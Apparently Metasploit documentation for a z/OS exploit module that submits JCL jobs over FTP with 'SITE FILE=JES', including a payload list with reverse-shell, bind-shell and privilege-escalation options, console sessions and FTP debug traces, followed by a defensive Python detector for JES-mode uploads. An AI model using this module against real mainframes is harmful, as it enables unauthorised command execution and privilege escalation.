z/OS JCL authorized FTP-based command execution - hints & tips

To use this exploit, you must have valid credentials on the target z/OS system, and those credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.

## Vulnerable Application

This exploit was tested on the FTP daemons for z/OS versions 1.13 and 2.1.

## Payloads

If the exploit works, any JCL the user has rights to submit can be submitted.

See the cmd-type payloads under mainframe that have jcl in the payload name, e.g.:

```
msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/apf_privesc_jcl                     normal  JCL to escalate privileges via APF LIB
   cmd/mainframe/bind_shell_jcl                      normal  Z/OS (MVS) Command Shell, Bind TCP
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP
```

## Verification Steps

A successful check of the exploit will look like this:

```
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1       yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```


## Debugging

If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run it again.
On a vulnerable system, the output should look similar to the following.

```
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on.  Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```

## Notes

Running the job will leave a joblog for the credentials used.
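
For defenders, the exchange shown under Debugging can be turned into a detection: the added example below (not part of the module or the Metasploit project) flags FTP sessions where `SITE FILE=JES` is accepted and an upload follows, and records the FTP user so the alert can be matched to the joblog. The log format, the function name and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of FTP control-channel lines in a hypothetical sensor
# format: time, client, server, direction (C = client, S = server), raw line.
SAMPLE_LOG = """\
16:52:32 10.10.20.5 10.10.10.1 C USER ftptest
16:52:33 10.10.20.5 10.10.10.1 C PASS ********
16:52:33 10.10.20.5 10.10.10.1 S 230 FTPTEST is logged on.
16:52:34 10.10.20.5 10.10.10.1 C site file=jes
16:52:34 10.10.20.5 10.10.10.1 S 200 SITE command was accepted
16:52:35 10.10.20.5 10.10.10.1 C STOR JOB1
16:53:01 10.10.20.9 10.10.10.1 C USER backup
16:53:02 10.10.20.9 10.10.10.1 C STOR REPORT.TXT
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) ([CS]) (.*)$")
# SITE FILEtype=<value>; "FILE" is the abbreviated form seen in the module output.
FILETYPE = re.compile(r"^SITE\s+(?:.*\s)?FILE[A-Z]*=(\w+)", re.I)


def detect_jes_sessions(log_text):
    """Return (time, client, user, event) for JES-mode entry and uploads."""
    state = defaultdict(lambda: {"user": None, "pending": None, "jes": False})
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, client, server, direction, text = m.groups()
        s = state[(client, server)]
        if direction == "S":
            # A 200 reply confirms the FILETYPE change the client last asked for.
            if s["pending"] and text.startswith("200"):
                s["jes"] = s["pending"] == "JES"
                if s["jes"]:
                    alerts.append((ts, client, s["user"], "jes_mode"))
            s["pending"] = None
            continue
        verb, _, arg = text.partition(" ")
        if verb.upper() == "USER":
            s.update(user=arg.strip(), pending=None, jes=False)
        elif verb.upper() == "SITE":
            ft = FILETYPE.match(text)
            s["pending"] = ft.group(1).upper() if ft else None
        elif verb.upper() == "STOR" and s["jes"]:
            # In JES mode an upload is handed to JES as a job, not stored as a file.
            alerts.append((ts, client, s["user"], "jes_submit"))
    return alerts
```

Calling `detect_jes_sessions(SAMPLE_LOG)` returns two alerts for `ftptest` and none for the ordinary upload by `backup`.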
